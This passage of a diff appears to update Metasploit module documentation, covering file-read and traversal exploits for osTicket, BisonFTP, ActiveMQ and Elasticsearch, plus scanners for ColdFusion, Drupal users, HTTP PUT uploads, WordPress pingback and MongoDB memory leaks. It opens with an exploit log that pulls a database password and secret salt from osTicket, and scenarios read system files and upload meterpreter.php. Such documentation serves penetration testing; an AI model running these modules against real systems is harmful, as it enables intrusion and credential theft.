||||
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=uf493kdg73eh3bf11pmcv6ed54;
|
||||
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=0e9e898a719233e0a4ecec120cd047d0cd9507ee
|
||||
[*] osticket_login_scp: POST /scp/login.php with userid=newuser
|
||||
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
|
||||
[-] osticket_login_scp: Login FAILED (still see login form)
|
||||
[*] do_login: Staff panel login failed
|
||||
[*] do_login: Trying client portal login...
|
||||
[*] osticket_login_client: GET /login.php
|
||||
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
|
||||
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=dba0292e34ca0ff8fc036933d4d6db2a2eb791df
|
||||
[*] osticket_login_client: POST /login.php with luser=newuser
|
||||
[*] osticket_login_client: POST response code=302, body contains luser=false
|
||||
[+] osticket_login_client: Login SUCCESS
|
||||
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
|
||||
[+] Authenticated via client portal
|
||||
[!] No TICKET_NUMBER supplied — a new ticket will be created each time this module runs
|
||||
[*] create_ticket: GET /open.php
|
||||
[*] extract_csrf_token: Searching HTML (6579 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
|
||||
[*] detect_open_form_fields: topicId=2
|
||||
[*] fetch_topic_form_fields: GET /ajax.php/form/help-topic/2
|
||||
[*] fetch_topic_form_fields: subject="eac457d4f21b58", message="56f3da3b9db7ae"
|
||||
[*] create_ticket: POST /open.php (topicId=2)
|
||||
[*] create_ticket: POST response code=302
|
||||
[+] create_ticket: Ticket created, internal ID=12
|
||||
[*] fetch_ticket_number: GET /tickets.php?id=12
|
||||
[+] fetch_ticket_number: Ticket number=#169169
|
||||
[+] Created ticket #169169 (internal ID: 12)
|
||||
[*] Generating PHP filter chain payload...
|
||||
[*] Payload generated (13656 bytes)
|
||||
[*] Submitting payload as ticket reply...
|
||||
[*] submit_ticket_reply: GET /tickets.php?id=12 to fetch CSRF token
|
||||
[*] submit_ticket_reply: GET response code=200, body=9618 bytes
|
||||
[*] extract_csrf_token: Searching HTML (9618 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
|
||||
[*] submit_ticket_reply: Using textarea field '56f3da3b9db7ae', payload=13656 bytes
|
||||
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=12
|
||||
[*] submit_ticket_reply: POST response code=200, body=24137 bytes
|
||||
[*] submit_ticket_reply: Success indicators found=true
|
||||
[+] Reply posted successfully
|
||||
[*] Downloading ticket PDF...
|
||||
[*] download_ticket_pdf: Trying PDF export from /tickets.php
|
||||
[*] download_ticket_pdf: GET /tickets.php?a=print&id=12
|
||||
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=57262
|
||||
[+] download_ticket_pdf: Got PDF (57262 bytes)
|
||||
[+] PDF downloaded (57262 bytes)
|
||||
[*] Extracting file from PDF...
|
||||
[*] extract_files_from_pdf: Processing PDF (57262 bytes)
|
||||
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
|
||||
[*] extract_pdf_image_streams: Found image object (6357 bytes decompressed)
|
||||
[*] extract_files_from_pdf: Found 2 image XObject streams
|
||||
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
|
||||
[*] extract_files_from_pdf: Image #1: 6357 bytes, swapped to BGR
|
||||
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 6357-byte stream
|
||||
[*] extract_data_from_bmp_stream: 6353 bytes after marker (nulls stripped)
|
||||
[*] First 96 bytes of data after marker and null-strip:
|
||||
[*] ascii: "<?php./*********************************************************************. ost-config.php."
|
||||
[*] hex: 3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
|
||||
[*] Data looks like base64? false
|
||||
[*] Treating as plain (non-base64) - preview:
|
||||
[*] ascii: "<?php./*********************************************************************. ost-config.php."
|
||||
[*] hex: 3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
|
||||
[+] extract_files_from_pdf: Image #1 yielded 6353 bytes of extracted data
|
||||
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
|
||||
[*] extract_files_from_pdf: Total extracted files: 1
|
||||
[+] Extracted 6353 bytes
|
||||
|
||||
======================================================================
|
||||
EXTRACTED FILE CONTENTS
|
||||
======================================================================
|
||||
|
||||
--- [include/ost-config.php] (6353 bytes) ---
|
||||
<?php
|
||||
/*********************************************************************
|
||||
ost-config.php
|
||||
|
||||
Static osTicket configuration file. Mainly useful for mysql login info.
|
||||
Created during installation process and shouldn't change even on upgrades.
|
||||
|
||||
Peter Rotich <peter@osticket.com>
|
||||
Copyright (c) 2006-2010 osTicket
|
||||
http://www.osticket.com
|
||||
|
||||
Released under the GNU General Public License WITHOUT ANY WARRANTY.
|
||||
See LICENSE.TXT for details.
|
||||
|
||||
vim: expandtab sw=4 ts=4 sts=4:
|
||||
$Id: $
|
||||
**********************************************************************/
|
||||
|
||||
#Disable direct access.
|
||||
if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
|
||||
die('kwaheri rafiki!');
|
||||
|
||||
#Install flag
|
||||
define('OSTINSTALLED',TRUE);
|
||||
if(OSTINSTALLED!=TRUE){
|
||||
if(!file_exists(ROOT_DIR.'setup/install.php')) die('Error: Contact system admin.'); //Something is really wrong!
|
||||
//Invoke the installer.
|
||||
header('Location: '.ROOT_PATH.'setup/install.php');
|
||||
exit;
|
||||
}
|
||||
|
||||
# Encrypt/Decrypt secret key - randomly generated during installation.
|
||||
define('SECRET_SALT','ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P');
|
||||
|
||||
#Default admin email. Used only on db connection issues and related alerts.
|
||||
define('ADMIN_EMAIL','administrator@localhost.local');
|
||||
|
||||
# Database Options
|
||||
# ====================================================
|
||||
# Mysql Login info
|
||||
#
|
||||
define('DBTYPE','mysql');
|
||||
# DBHOST can have comma separated hosts (e.g db1:6033,db2:6033)
|
||||
define('DBHOST','localhost');
|
||||
define('DBNAME','osticket_db');
|
||||
define('DBUSER','osticket_user');
|
||||
define('DBPASS','P@ssw0rd123!');
|
||||
|
||||
# Database TCP/IP Connect Timeout (default: 3 seconds)
|
||||
# Timeout is important when DBHOST has multiple proxies to try
|
||||
# define('DBCONNECT_TIMEOUT', 3);
|
||||
|
||||
# Table prefix
|
||||
define('TABLE_PREFIX','ost_');
|
||||
|
||||
#
|
||||
# SSL Options
|
||||
# ---------------------------------------------------
|
||||
# SSL options for MySQL can be enabled by adding a certificate allowed by
|
||||
# the database server here. To use SSL, you must have a client certificate
|
||||
# signed by a CA (certificate authority). You can easily create this
|
||||
# yourself with the EasyRSA suite. Give the public CA certificate, and both
|
||||
# the public and private parts of your client certificate below.
|
||||
#
|
||||
# Once configured, you can ask MySQL to require the certificate for
|
||||
# connections:
|
||||
#
|
||||
# > create user osticket;
|
||||
# > grant all on osticket.* to osticket require subject '<subject>';
|
||||
#
|
||||
# More information (to-be) available in doc/security/hardening.md
|
||||
|
||||
# define('DBSSLCA','/path/to/ca.crt');
|
||||
# define('DBSSLCERT','/path/to/client.crt');
|
||||
# define('DBSSLKEY','/path/to/client.key');
|
||||
|
||||
#
|
||||
# Mail Options
|
||||
# ===================================================
|
||||
# Option: MAIL_EOL (default: \n)
|
||||
#
|
||||
# Some mail setups do not handle emails with \r\n (CRLF) line endings for
|
||||
# headers and base64 and quoted-response encoded bodies. This is an error
|
||||
# and a violation of the internet mail RFCs. However, because this is also
|
||||
# outside the control of both osTicket development and many server
|
||||
#
|
||||
|
||||
... (truncated)
|
||||
[+] Saved to: /home/tintin/.msf4/loot/20260321104202_default_127.0.0.1_osticket.include_866909.php
|
||||
|
||||
======================================================================
|
||||
KEY FINDINGS
|
||||
======================================================================
|
||||
[+] SECRET_SALT: ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P
|
||||
[+] ADMIN_EMAIL: administrator@localhost.local
|
||||
[+] DBHOST: localhost
|
||||
[+] DBNAME: osticket_db
|
||||
[+] DBUSER: osticket_user
|
||||
[+] DBPASS: P@ssw0rd123!
|
||||
[!] No active DB -- Credential data will not be saved!
|
||||
|
||||
[+] Exploitation complete
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,83 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a directory traversal vulnerability in BisonWare BisonFTP Server
|
||||
version 3.5. The flaw allows an attacker to download arbitrary files from the server by
|
||||
sending a crafted `RETR` command using traversal strings such as `..//`.
|
||||
|
||||
The vulnerability is tracked as [CVE-2015-7602](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602).
|
||||
|
||||
### Setup
|
||||
|
||||
1. Download BisonWare BisonFTP Server 3.5 from [Exploit-DB (EDB-38341)](https://www.exploit-db.com/exploits/38341).
|
||||
2. Install and run it on a Windows host.
|
||||
3. Configure the FTP root directory and ensure the service is listening (default port 21).
|
||||
4. Set up an anonymous login or create a user account with credentials.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/ftp/bison_ftp_traversal`
|
||||
3. Do: `set RHOSTS [target IP]`
|
||||
4. Do: `run`
|
||||
5. You should see the requested file contents stored as loot.
|
||||
|
||||
## Options
|
||||
|
||||
### DEPTH
|
||||
|
||||
The number of traversal sequences (`..//`) to prepend to the file path. The default is `32`.
|
||||
A high value is used because the exact depth of the FTP root can vary.
|
||||
|
||||
### PATH
|
||||
|
||||
The path to the file to retrieve from the target, relative to the drive root. The default value
|
||||
is `boot.ini`. For example, to read the Windows hosts file, set this to
|
||||
`windows/system32/drivers/etc/hosts`.
|
||||
|
||||
### FTPUSER
|
||||
|
||||
The FTP username to authenticate with. Default is `anonymous`.
|
||||
|
||||
### FTPPASS
|
||||
|
||||
The FTP password to authenticate with. Default is `mozilla@example.com`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### BisonFTP 3.5 on Windows XP
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/bison_ftp_traversal
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
|
||||
RHOSTS => 192.168.1.10
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH boot.ini
|
||||
PATH => boot.ini
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
|
||||
|
||||
[+] Stored boot.ini to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_123456.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### Reading the hosts file
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/bison_ftp_traversal
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
|
||||
RHOSTS => 192.168.1.10
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH windows/system32/drivers/etc/hosts
|
||||
PATH => windows/system32/drivers/etc/hosts
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
|
||||
|
||||
[*] Data returned:
|
||||
# Copyright (c) 1993-2009 Microsoft Corp.
|
||||
#
|
||||
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
|
||||
|
||||
[+] Stored windows/system32/drivers/etc/hosts to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_654321.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -0,0 +1,55 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on
|
||||
Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions,
|
||||
allowing an unauthenticated attacker to read arbitrary files from the target host.
|
||||
|
||||
The vulnerability is tracked as [CVE-2010-1587](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1587).
|
||||
|
||||
### Setup
|
||||
|
||||
To test this module you need a Windows host running one of the affected versions:
|
||||
|
||||
1. Download [Apache ActiveMQ 5.3.1](http://archive.apache.org/dist/activemq/apache-activemq/5.3.1/) or 5.3.2.
|
||||
2. Extract the archive and run `bin\activemq.bat` to start the broker.
|
||||
3. The web console listens on port **8161** by default.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/apache_activemq_traversal`
|
||||
3. Do: `set RHOSTS [target IP]`
|
||||
4. Do: `set RPORT 8161`
|
||||
5. Do: `run`
|
||||
6. You should see the contents of the requested file saved as loot.
|
||||
|
||||
## Options
|
||||
|
||||
### FILEPATH
|
||||
|
||||
The path of the file to retrieve from the target system, relative to the drive root. The default
|
||||
value is `/windows\\win.ini`. Backslashes must be used for path separators on Windows targets.
|
||||
|
||||
### DEPTH
|
||||
|
||||
The number of traversal sequences (`/\..`) to prepend to the request. The default is `4`. If the
|
||||
file is not found, try increasing this value.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ActiveMQ 5.3.1 on Windows Server 2003 SP2
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/apache_activemq_traversal
|
||||
msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
|
||||
RPORT => 8161
|
||||
msf auxiliary(scanner/http/apache_activemq_traversal) > run
|
||||
|
||||
[*] 192.168.1.100:8161 - Sending request...
|
||||
[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -0,0 +1,57 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to identify Adobe ColdFusion installations and determine the version
|
||||
running on the target. It inspects the ColdFusion Administrator login page at
|
||||
`/CFIDE/administrator/index.cfm` and fingerprints the version based on meta tags, copyright
|
||||
strings, and other patterns in the HTML response. The module can detect ColdFusion MX6, MX7,
|
||||
8, 9, and 10, as well as identify the underlying operating system from the `Server` header.
|
||||
|
||||
### Setup
|
||||
|
||||
Install any version of Adobe ColdFusion up to version 10. The default installation should
|
||||
have the administrator page accessible at `/CFIDE/administrator/index.cfm`. No additional
|
||||
configuration is needed.
|
||||
|
||||
Alternatively, older ColdFusion trial installers can often be found on the
|
||||
[Adobe archive](https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/coldfusion_version`
|
||||
3. Do: `set RHOSTS [target IP]`
|
||||
4. Do: `run`
|
||||
5. You should see the detected ColdFusion version and OS printed to the console.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ColdFusion 9 on Windows Server 2008
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/coldfusion_version
|
||||
msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.20
|
||||
RHOSTS => 10.0.0.20
|
||||
msf auxiliary(scanner/http/coldfusion_version) > set THREADS 5
|
||||
THREADS => 5
|
||||
msf auxiliary(scanner/http/coldfusion_version) > run
|
||||
|
||||
[+] 10.0.0.20: Adobe ColdFusion 9 (administrator access) (Windows (Microsoft-IIS/7.5))
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### ColdFusion 8 on Linux
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/coldfusion_version
|
||||
msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.30
|
||||
RHOSTS => 10.0.0.30
|
||||
msf auxiliary(scanner/http/coldfusion_version) > run
|
||||
|
||||
[+] 10.0.0.30: Adobe ColdFusion 8 (administrator access) (Unix (Apache/2.2.22))
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -0,0 +1,54 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an information disclosure vulnerability in the
|
||||
[Views](https://www.drupal.org/project/views) module for Drupal 6. When the Views module
|
||||
version 6.x-2.11 or earlier is installed, the autocomplete callback for user fields is
|
||||
accessible without proper authorization. The module brute-forces the first 10 usernames by
|
||||
iterating through the letters `a` to `z`.
|
||||
|
||||
Drupal does not consider disclosure of usernames to be a security weakness on its own, but
|
||||
enumerated usernames can be useful for password-guessing attacks.
|
||||
|
||||
### Setup
|
||||
|
||||
1. Install Drupal 6 with the Views module version 6.x-2.11 or earlier.
|
||||
2. Create several user accounts so there is data to enumerate.
|
||||
3. Ensure the Views module is enabled under **Administer > Site building > Modules**.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/drupal_views_user_enum`
|
||||
3. Do: `set RHOSTS [target IP]`
|
||||
4. Do: `run`
|
||||
5. You should see a list of discovered usernames printed to the console.
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
The base path to the Drupal installation. The default value is `/`. Change this if Drupal is
|
||||
installed in a subdirectory, for example `/drupal/`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Drupal 6.x with Views 6.x-2.11
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/drupal_views_user_enum
|
||||
msf auxiliary(scanner/http/drupal_views_user_enum) > set RHOSTS 192.168.1.50
|
||||
RHOSTS => 192.168.1.50
|
||||
msf auxiliary(scanner/http/drupal_views_user_enum) > set TARGETURI /
|
||||
TARGETURI => /
|
||||
msf auxiliary(scanner/http/drupal_views_user_enum) > run
|
||||
|
||||
[*] Begin enumerating users at 192.168.1.50
|
||||
[+] Found User: admin
|
||||
[+] Found User: john
|
||||
[+] Found User: testuser
|
||||
[*] Done. 3 usernames found...
|
||||
[*] Usernames stored in: /root/.msf4/loot/20250319120000_default_192.168.1.50_drupal_user_123456.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -0,0 +1,55 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a directory traversal vulnerability in ElasticSearch versions prior to
|
||||
1.6.1. The flaw exists in the Snapshot API and allows an unauthenticated attacker to read
|
||||
arbitrary files from the target system with the privileges of the JVM process.
|
||||
|
||||
The vulnerability is tracked as [CVE-2015-5531](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531).
|
||||
|
||||
### Setup
|
||||
|
||||
1. Install a vulnerable version of ElasticSearch (prior to 1.6.1). Older releases are available
|
||||
from the [ElasticSearch downloads archive](https://www.elastic.co/downloads/past-releases).
|
||||
2. Configure a `path.repo` in `elasticsearch.yml` so that the Snapshot API is available:
|
||||
```
|
||||
path.repo: ["/tmp/backups"]
|
||||
```
|
||||
3. Start ElasticSearch. It listens on port **9200** by default.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/elasticsearch_traversal`
|
||||
3. Do: `set RHOSTS [target IP]`
|
||||
4. Do: `run`
|
||||
5. You should see the requested file contents saved as loot.
|
||||
|
||||
## Options
|
||||
|
||||
### FILEPATH
|
||||
|
||||
The path to the file to read on the target. The default value is `/etc/passwd`.
|
||||
|
||||
### DEPTH
|
||||
|
||||
The number of `../` traversal sequences to include. The default is `7`. Increase this if the
|
||||
file cannot be reached with the default depth.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ElasticSearch 1.5.2 on Ubuntu 14.04
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/elasticsearch_traversal
|
||||
msf auxiliary(scanner/http/elasticsearch_traversal) > set RHOSTS 10.10.10.50
|
||||
RHOSTS => 10.10.10.50
|
||||
msf auxiliary(scanner/http/elasticsearch_traversal) > set RPORT 9200
|
||||
RPORT => 9200
|
||||
msf auxiliary(scanner/http/elasticsearch_traversal) > run
|
||||
|
||||
[*] The target appears to be vulnerable.
|
||||
[+] File saved in: /root/.msf4/loot/20250319120000_default_10.10.10.50_elasticsearch.tr_123456.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
@@ -1,44 +1,63 @@
|
||||
## Description
|
||||
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
|
||||
## Vulnerable Application
|
||||
|
||||
This module targets web servers that allow HTTP PUT and DELETE methods without proper restrictions.
|
||||
|
||||
Improper configuration of HTTP PUT can allow attackers to upload arbitrary files to the server.
|
||||
If executable files are uploaded, this may lead to:
|
||||
|
||||
- Arbitrary file upload
|
||||
- Remote code execution
|
||||
- Website defacement
|
||||
- Unauthorized content modification
|
||||
|
||||
DELETE method misuse can allow attackers to remove existing files from the server.
|
||||
|
||||
To test this module:
|
||||
|
||||
1. Set up a web server (Apache, Nginx, IIS, etc.)
|
||||
2. Ensure HTTP PUT/DELETE methods are enabled
|
||||
3. Confirm lack of authentication or access control
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/http_put```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```set PATH [PATH]```
|
||||
5. Do: ```set FILENAME [FILENAME]```
|
||||
6. Do: ```set FILEDATA [PATH]```
|
||||
7. Do: ```run```
|
||||
1. Start Metasploit: `msfconsole`
|
||||
2. Load the module: `use auxiliary/scanner/http/http_put`
|
||||
3. Set options:
|
||||
- `set RHOSTS [IP]`
|
||||
- `set RPORT [PORT]`
|
||||
- `set PATH [PATH]`
|
||||
- `set FILENAME [FILENAME]`
|
||||
- `set FILEDATA [PATH]`
|
||||
4. Run: `run`
|
||||
|
||||
If vulnerable, the module will confirm successful upload or deletion.
|
||||
|
||||
## Options
|
||||
|
||||
### ACTION
|
||||
|
||||
Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
|
||||
Set `ACTION` to either `PUT` or `DELETE`. Default is `PUT`.
|
||||
|
||||
### PUT
|
||||
|
||||
Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
|
||||
Uploads files to the server. If `FILENAME` is not specified, a random `.txt` file is generated.
|
||||
|
||||
### DELETE
|
||||
### DELETE
|
||||
|
||||
Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE.
|
||||
Deletes the file specified in `FILENAME`.
|
||||
|
||||
### PATH
|
||||
|
||||
The path at which this module will attempt to either PUT the content or DELETE it.
|
||||
Target path for upload or deletion.
|
||||
|
||||
### FILEDATA
|
||||
|
||||
The content to put in the uploaded file when `ACTION` is set to `PUT`.
|
||||
|
||||
Content to upload when using PUT.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Here `ACTION` is by default set to `PUT`.
|
||||
|
||||
```
|
||||
Example usage with `ACTION` set to `PUT` (default):
|
||||
```bash
|
||||
msf > use auxiliary/scanner/http/http_put
|
||||
msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
|
||||
RHOSTS => 1.1.1.23
|
||||
@@ -48,13 +67,11 @@ msf auxiliary(scanner/http/http_put) > set PATH /uploads
|
||||
PATH => /uploads
|
||||
msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
|
||||
FILENAME => meterpreter.php
|
||||
msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
|
||||
FILEDATA => file://root/Desktop/meterpreter.php
|
||||
msf auxiliary(scanner/http/http_put) > run
|
||||
|
||||
msf auxiliary(scanner/http/http_put) > set FILEDATA file:/root/Desktop/meterpreter.php
|
||||
FILEDATA => file:/root/Desktop/meterpreter.php
|
||||
msf auxiliary(scanner/http/http_put) > run
|
||||
[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(scanner/http/http_put) >
|
||||
```
|
||||
|
||||
|
||||
@@ -0,0 +1,44 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module checks for accessible WordPress pingback functionality.
|
||||
|
||||
Pingback is an XML-RPC feature in WordPress that allows blogs to notify each other of references.
|
||||
If enabled, it can be abused for:
|
||||
|
||||
- DDoS amplification attacks
|
||||
- Internal network scanning
|
||||
- Information disclosure
|
||||
|
||||
To test this module:
|
||||
|
||||
1. Set up a WordPress instance (any version with XML-RPC enabled)
|
||||
2. Ensure `/xmlrpc.php` is accessible
|
||||
3. Pingback functionality should not be disabled
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start Metasploit: `msfconsole`
|
||||
2. Load the module: `use auxiliary/scanner/http/wordpress_pingback_access`
|
||||
3. Set the target: `set RHOSTS example.com`
|
||||
4. Run the module: `run`
|
||||
|
||||
If vulnerable, the module will indicate that pingback access is enabled.
|
||||
|
||||
## Options
|
||||
|
||||
This module has no additional options beyond the standard ones.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example usage against a WordPress site with pingback enabled:
|
||||
```bash
|
||||
msf > use auxiliary/scanner/http/wordpress_pingback_access
|
||||
msf auxiliary(scanner/http/wordpress_pingback_access) > set RHOSTS example.com
|
||||
RHOSTS => example.com
|
||||
msf auxiliary(scanner/http/wordpress_pingback_access) > run
|
||||
[*] Checking pingback access on example.com
|
||||
[+] Pingback is enabled and accessible at /xmlrpc.php
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(scanner/http/wordpress_pingback_access) >
|
||||
```
|
||||
@@ -1,8 +1,11 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
|
||||
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to
|
||||
as "Mongobleed."
|
||||
|
||||
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
|
||||
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed
|
||||
uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the
|
||||
decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
|
||||
|
||||
The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
|
||||
- Database credentials
|
||||
@@ -11,7 +14,8 @@ The vulnerability allows unauthenticated remote attackers to leak server memory
|
||||
- Connection strings
|
||||
- Application data
|
||||
|
||||
**Note:** This vulnerability only affects servers with zlib compression enabled. The module will check for zlib compression support before attempting exploitation.
|
||||
This vulnerability only affects servers with zlib compression enabled. The module checks for zlib compression support before attempting
|
||||
exploitation.
|
||||
|
||||
### Vulnerable Versions
|
||||
|
||||
@@ -39,44 +43,14 @@ Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
|
||||
## Verification Steps
|
||||
|
||||
1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
|
||||
2. Start the MongoDB service
|
||||
2. Start the MongoDB service with zlib compression enabled
|
||||
3. Start msfconsole
|
||||
4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
|
||||
5. `set RHOSTS <target>`
|
||||
6. `set ACTION CHECK` then `run` (optional - quick vulnerability check)
|
||||
7. `set ACTION SCAN` then `run` (full exploitation)
|
||||
6. `check` to verify the target is vulnerable
|
||||
7. `run` to perform the full memory leak scan
|
||||
8. Verify that memory contents are leaked and saved to loot
|
||||
|
||||
## Actions
|
||||
|
||||
The module supports two actions:
|
||||
|
||||
### SCAN (Default)
|
||||
Full exploitation that scans memory offsets and extracts leaked data.
|
||||
|
